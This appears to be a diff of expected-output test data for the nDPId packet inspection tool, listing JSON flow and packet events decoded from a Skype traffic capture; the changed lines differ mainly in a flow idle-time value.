-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431969717900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717900,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ie5AAEAGPWbAqAEiEY+gFsEnFGeW8KpSgTPGMoAQD\/lO7gAAAQEICj4jsIZVSgI6"} -00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2046,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431969717901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431969717901,"pkt":"0NQSxnP1PBXCt3IOCABFAACOywdAAEAG+\/LAqAEiEY+gFsEnFGeW8KpSgTPGMoAYEAClWwAAAQEICj4jsIdVSgI6FwMBACBFSXcAQNGwOhcu0QVlHuKzyvFkGgpCme0Kai94jEbJ0RcDAQAwQN+VK2ikiOW7uk5UyLlTNolrUZSBmQX1wD8NXzXPIFfAPuABh4UNMZuiOLR\/\/d5p"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1984,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717177,"flow_last_seen":1431969717177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717177,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1984,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1431969717177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717177,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+WNAAEAGAQPAqAEiUA4uecPLET9q+lcrAAAAALAC\/\/9zkwAAAgQFtAEDAwUBAQgKPiOtxAAAAAAEAgAA"} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1987,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1431969717265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717265,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoQ1AAHQGJVlQDi55wKgBIhE\/w8sUK4TLavpXLLAS\/\/\/FfwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1988,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1431969717265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717265,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NNxAAEAGxZbAqAEiUA4uecPLET9q+lcsFCuEzIAQECwJ2AAAAQEICj4jrhsAAAAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1992,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717295,"flow_last_seen":1431969717295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717295,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1992,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1431969717295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717295,"pkt":"0NQSxnP1PBXCt3IOCABFAABAu4NAAEAGWCzAqAEiUYUTucPMrY9zRWLSAAAAALAC\/\/\/cJAAAAgQFtAEDAwUBAQgKPiOuOAAAAAAEAgAA"} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1431969717374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717374,"pkt":"PBXCt3IO0NQSxnP1CABFAABAwAFAADAGY65RhRO5wKgBIq2Pw8wuoXfGc0Vi07AS\/\/\/8vwAAAgQFrAEDAwUBAQgKArA2RD4jrjgEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431969717375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717375,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0inxAAEAGiT\/AqAEiUYUTucPMrY9zRWLTLqF3x4AQECwsDQAAAQEICj4jroYCsDZE"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431969717899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1431969717899,"pkt":"PBXCt3IO0NQSxnP1CABFAAEJlCBAADAGQl8Rj6AWwKgBIhRnwSeBM8VdlvCqUoAYASHIigAAAQEIClVKAjo+IiGKFwMBANBGiA2FCgkg8zogS8Wv8uA0hKKXZpqXahZerQ98bBCn7C+LnTtdb1gFMe8akVD0ZXaKV2LbbgrevU7SQvBoNrIKmLDngOd7HnJnwMZSKAgZhBWjSGnNxPPChGecLDOMDXdtNcHO5aH0kerDi4eahd\/xxcweKHEqdaSg9EF7AN1znxgL9Vtu5lzdAyFIAlRZuEfAfgPOG5VblTu4iCKf5kwtqrTH0XrU9yr9hT+57cz\/TU37sy04NvAQJNXRsNfuIJU+SbJ1mgQuWHV+U5AtBgSt"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431969717900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717900,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ie5AAEAGPWbAqAEiEY+gFsEnFGeW8KpSgTPGMoAQD\/lO7gAAAQEICj4jsIZVSgI6"} 
+00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2046,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431969717901,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431969717901,"pkt":"0NQSxnP1PBXCt3IOCABFAACOywdAAEAG+\/LAqAEiEY+gFsEnFGeW8KpSgTPGMoAYEAClWwAAAQEICj4jsIdVSgI6FwMBACBFSXcAQNGwOhcu0QVlHuKzyvFkGgpCme0Kai94jEbJ0RcDAQAwQN+VK2ikiOW7uk5UyLlTNolrUZSBmQX1wD8NXzXPIFfAPuABh4UNMZuiOLR\/\/d5p"} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":1431969717905,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1431969717905,"pkt":"PBXCt3IOxCwDBkn+CABFAADBmPEAAP8RfzrAqAFc4AAA+xTpFOkArRpOAAAAAAAEAAMAAAAAC19hZnBvdmVydGNwBF90Y3AFbG9jYWwAAAwAAQRfcmZiwBgADAABBF9zbWLAGAAMAAEGX2FkaXNrwBgADAABwAwADAABAAAPuAAWE0x1Y2HigJlzIE1hY0Jvb2tQcm\/ADMAMAAwAAQAADAoAEA1MdWNh4oCZcyBpTWFjwAzAMwAMAAEAAAwKABANTHVjYeKAmXMgaU1hY8Az"} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2048,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":1431969717906,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":227,"pkt_l4_len":173,"thread_ts_msec":1431969717906,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NAK0R\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QCtrJ4AAAAAAAQAAwAAAAALX2FmcG92ZXJ0Y3AEX3RjcAVsb2NhbAAADAABBF9yZmLAGAAMAAEEX3NtYsAYAAwAAQZfYWRpc2vAGAAMAAHADAAMAAEAAA+4ABYTTHVjYeKAmXMgTWFjQm9va1Byb8AMwAwADAABAAAMCgAQDUx1Y2HigJlzIGlNYWPADMAzAAwAAQAADAoAEA1MdWNh4oCZcyBpTWFjwDM="} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2055,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717949,"flow_last_seen":1431969717949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717949,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1431969717949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717949,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1MFAAEAGbfDAqAEiW77afcPNMD7mkcxwAAAAALAC\/\/+pEQAAAgQFtAEDAwUBAQgKPiOwswAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2056,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717949,"flow_last_seen":1431969717949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717949,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1431969717949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717949,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjMJAAEAGuFXAqAEiW77YF8POMD6CImXAAAAAALAC\/\/92lQAAAgQFtAEDAwUBAQgKPiOwtAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1431969717992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969717992,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGUBRbvtgXwKgBIjA+w86t1YyggiJlwaASOJDgygAAAgQFrAQCCAoNJSaXPiOwtAEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1431969717992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717992,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ynpAAEAGeqnAqAEiW77YF8POMD6CImXBrdWMoYAQECw3ygAAAQEICj4jsN8NJSaX"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2062,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1431969718010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969718010,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0kN5AAPQG\/d5bvtp9wKgBIjA+w83ZQ\/6U5pHMcYASH\/7YKwAAAgQFoAEDAwQBAQQC"} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2063,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1431969718010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969718010,"pkt":"0NQSxnP1PBXCt3IOCABFAAAonhdAAEAGpLLAqAEiW77afcPNMD7mkcxx2UP+lVAQIAAY5QAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2078,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969718289,"flow_last_seen":1431969718289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969718289,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2078,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1431969718289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969718289,"pkt":"0NQSxnP1PBXCt3IOCABFAABAEiZAAEAG6EDAqAEiUA4uecPPET\/DDsi2AAAAALAC\/\/+lsQAAAgQFtAEDAwUBAQgKPiOyAgAAAAAEAgAA"} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2084,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1431969718386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969718386,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoSFAAHQGJUVQDi55wKgBIhE\/w88Zt5eOww7It7AS\/\/\/jjAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2085,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1431969718386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969718386,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PHJAAEAGvgDAqAEiUA4uecPPET\/DDsi3GbeXj4AQECwjnwAAAQEICj4jsmEAAAAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2055,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717949,"flow_last_seen":1431969717949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717949,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1431969717949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717949,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1MFAAEAGbfDAqAEiW77afcPNMD7mkcxwAAAAALAC\/\/+pEQAAAgQFtAEDAwUBAQgKPiOwswAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2056,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717949,"flow_last_seen":1431969717949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717949,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1431969717949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717949,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjMJAAEAGuFXAqAEiW77YF8POMD6CImXAAAAAALAC\/\/92lQAAAgQFtAEDAwUBAQgKPiOwtAAAAAAEAgAA"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1431969717992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969717992,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGUBRbvtgXwKgBIjA+w86t1YyggiJlwaASOJDgygAAAgQFrAQCCAoNJSaXPiOwtAEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1431969717992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717992,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ynpAAEAGeqnAqAEiW77YF8POMD6CImXBrdWMoYAQECw3ygAAAQEICj4jsN8NJSaX"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2062,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1431969718010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969718010,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0kN5AAPQG\/d5bvtp9wKgBIjA+w83ZQ\/6U5pHMcYASH\/7YKwAAAgQFoAEDAwQBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2063,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1431969718010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969718010,"pkt":"0NQSxnP1PBXCt3IOCABFAAAonhdAAEAGpLLAqAEiW77afcPNMD7mkcxx2UP+lVAQIAAY5QAA"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2078,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969718289,"flow_last_seen":1431969718289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969718289,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2078,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1431969718289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969718289,"pkt":"0NQSxnP1PBXCt3IOCABFAABAEiZAAEAG6EDAqAEiUA4uecPPET\/DDsi2AAAAALAC\/\/+lsQAAAgQFtAEDAwUBAQgKPiOyAgAAAAAEAgAA"} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2084,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1431969718386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969718386,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoSFAAHQGJUVQDi55wKgBIhE\/w88Zt5eOww7It7AS\/\/\/jjAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2085,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1431969718386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969718386,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PHJAAEAGvgDAqAEiUA4uecPPET\/DDsi3GbeXj4AQECwjnwAAAQEICj4jsmEAAAAA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2112,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1431969718838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969718838,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuya0AAEARB4bAqAEisBo3pzLd+R0AGsL+nm0CcwIwd+MhD2imQikN7XJ0"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2113,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1431969718838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969718838,"pkt":"0NQSxnP1PBXCt3IOCABFAAAupZYAAEAR95jAqAEiTLnPDDLdsbUAGqRNnm8CZa4cvOCl2walp\/2oMJDI"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
